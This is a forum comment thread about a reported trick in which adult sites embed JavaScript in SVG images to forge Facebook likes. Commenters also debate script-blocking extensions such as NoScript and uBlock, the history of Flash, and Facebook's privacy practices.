That lead to the weird situation where browsers have two ways of embedding an SVG into a web page - embed in an <img> tag and the javascript won't run, but embed it in an <iframe> and it will (but of course iframe height can't auto-size...)
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
At one time I agreed and had even deleted my genuine FB acct. But had to create another one briefly in 2021 to find a rental - where I live now.
I still have my ancient fake FB acct for Marketplace, etc but it's walled off.
Yes!. And that container is in a Ffx instance, accessed as a remote app (here now but diff container).
If you want real isolation, user browser profiles.
But it's certainly good advice to check no other windows have been opened.
Well there's your problem right there.
But does not fix the CSRF vulnerability, apparently.
In a world where same-site cookies are the default you have to actively opt-in to this sort of thing.
Facebook might not care, but it is obviously a vulnerability. Sites can forge likes from users (which IIRC appear on timelines?).
Facebook does care. Allowing like buttons on third party sites was (at least historically) a major part of their business. Its not like they are just being apathetic here - they actively want people to be able to like things from outside of facebook and put in effort to make that happen.
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
The best thing about flash was that it let non-coders create interactive things. The editor with a timeline + code you could stick to objects was the best feature.
I had to learn to code properly after flash died, which probably was a good thing, but I still miss that way of making things.
But you are not missing flash, you are Missing Macromedia Director and co. These were wonderful tools, intuitive and easy to use. Flash was an abomination of a format, and it was dragging the web down, also security wise, it's good that Apple and Google killed it.
They did do that. Or am I missing something?
Also the dates don't work. HTTP/1.1 with gzip/compress/deflate encodints was live in browsers and servers with inline compression well before the standard was published in RFC 2068 in 1997. SVG's spec was four years behind that, and IIRC adoption being pretty glacial as far as completeness and compliance.
Why are they clicking like buttons instead of stealing money from bank accounts then?
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
Seems only narrowly applicable. I can see how you can use this logic to discount articles like "how to make a good blog" or whatever, but that's presumably only a tiny minority of article you'd read. If the topic is literally anything else it doesn't really hold. It doesn't seem fair to discount whatever an AI engineer or DBA has to say because they don't share the same fanaticism of lightweight sites as you. On the flip side I see plenty of AI generated slop that works fine with javascript disabled, because they're using some sort of SaaS (think medium) or static site generator.
For me, it's not about sites being lightweight, it's about sites not being trustworthy enough to allow them to run code on my machine.
For ML stuff I'd let e.g. mathjax fly, but I expect the surrounding prose to show up first to get me interested enough to enable scripts.
It's not an exact filter, but it gives some signal to feed into the "is this worth my time" model.
It's also odd to characterize it as fanaticism: scriptless sites are the default. If you just type words, it will work. You have to go out of your way to make a Rube Goldberg machine. I'm not interested in Rube Goldberg machines or the insights of the people that enjoy making them. Like if you own a restaurant and make your menu so that it's only available on a phone, I'll just leave. I don't appreciate the gimmick. Likewise for things that want me to install an app or use a cloud. Not happening.
Very approximately: there's a group that took the time to understand and attempt to build something robust, a group that has no interest in web except as a means to an end so threw it at a well reviewed static site generator, and a group that spent time futzing around with a rube goldberg machine yet didn't bother to seek deeper understanding.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
But that basically negates all security benefits, because all it takes to get a 0day payload to run is to make the content sufficiently enticing and make javascript "required" for viewing the site. You might save some battery/data usage, but if you value your time at all I suspect any benefits is going to be eaten by you having to constantly whitelist sites.
> if you value your time at all I suspect any benefits is going to be eaten by you having to constantly whitelist sites.
I don't constantly whitelist sites, only the ones I use regularly (like my email provider). Temporarily enabling JS on a broken site doesn't add it to my whitelist and only takes three clicks (which is muscle memory at this point):
1. Click to open UBlock window 2. Click to allow javascript temporarily 3. Click to refresh the page
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Take Hacker News. It's viable without JS, I can read, navigate and comment, but if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
>Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Doesn't the default ublock filter lists, plus maybe an extension for auto-closing cookie banners get most of those?
A whitelist approach is less nuanced but far more extensive. It defaults to defending you against unknown vulnerabilities.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
Most websites load their required scripts from their own domain. So you allowlist the domain you are visiting, and things just work. However, many websites also load JS from like 20 other domains for crap like tracking, ads, 3rd party logins, showing cookie popups, autoplaying videos, blah blah blah. Those stay blocked.
Try it out: Visit your local news website, open your uBlock Origin panel, and take a look at all the domains in the left half. There will probably be dozens of domains it's loading JS from. 90% of the time, the only one you actually need is the top one. The rest is 3rd party crap you can leave disabled.
And yeah, if a website doesn't work after allowlisting two or three domains, I usually just give up and leave. Tons of 3rd party JS is a strong indicator that the website is trying to show you ads or exploit you, so it's a good signal that it's not worth your time.
Noscript is just too painful for people who want to just browse the web. Its the gentoo of browser extensions. People with massive time & patience can do it yes, but the rest of us are best served by uBlock & standard browser protections.
I was already convinced, you don't need to keep selling it ;)
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
And excluding that content almost invariably improves the page.
No, not really. Usually just the top-level domain is enough. Very occasionally a site will have some other domain they serve from, and it's usually obvious which one to allowlist. It takes like, ten seconds, and you only need to do it once per domain if you make the allowlisting permanent. If you get really impatient, you can just allow all scripts for that tab and you're done.
It is some extra work, and I won't disagree if you think it's too much, but you're really overselling how much extra work it is.
This ought to be the default in every common web browser, just as you should have to look at the data sharing "partners" and decide whether they're benign enough for your taste.
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, you know meta has been using them to train their ai? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Facebook Marketplace supplanted a number of earlier sites - like Hotpads for rentals and Craigslist for cars.
In mid 2021 there were hundreds of applicants per rental listing - even on Marketplace. No one had a luxury of listing preference.
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
Eg you can’t enable sound on a webpage without a real click.
Running JS inside an image format sounds like a thing they could add permissions for (or a click-to-play overlay), especially if it can talk to other sites.
For this to work, the SVG has to be loaded in an iframe or in a new tab. Or it could be inlined in the HTML.
Nothing special about SVG really as long as you (Facebook) treat SVG files as images and don't inline it.
The SVG part only really comes in as a way to hide script tags from anyone looking at the network requests, but even then it seems that the specific SVG was crafted to download further scripts.
So what's the issue here exactly? It seems that Facebook is still somehow affected by XSS? Neat.
[1] https://www.malwarebytes.com/blog/news/2025/08/adult-sites-t...
- the OS previews it as an image, but on click it opens a website (which to be fair, once you click on a downloaded file, you're already done)
- SVGs are allowed in any "image/*" form, bypassing certain filters
Wouldn't that be discovered pretty quickly, when Bob's family and friends see porn promoted to them because John apparently liked it on Facebook. Eventually, one of them would mention it to him.
"Y'know, Bob, you probably don't want to be liking that on your main Facebook account... Are you feeling OK?"
I see what you did there ;)
StrauXX•6mo ago
The linked article just regurtitates the source.
throwaway290•6mo ago
lostmsu•6mo ago
throwaway290•6mo ago
lostmsu•6mo ago
throwaway290•6mo ago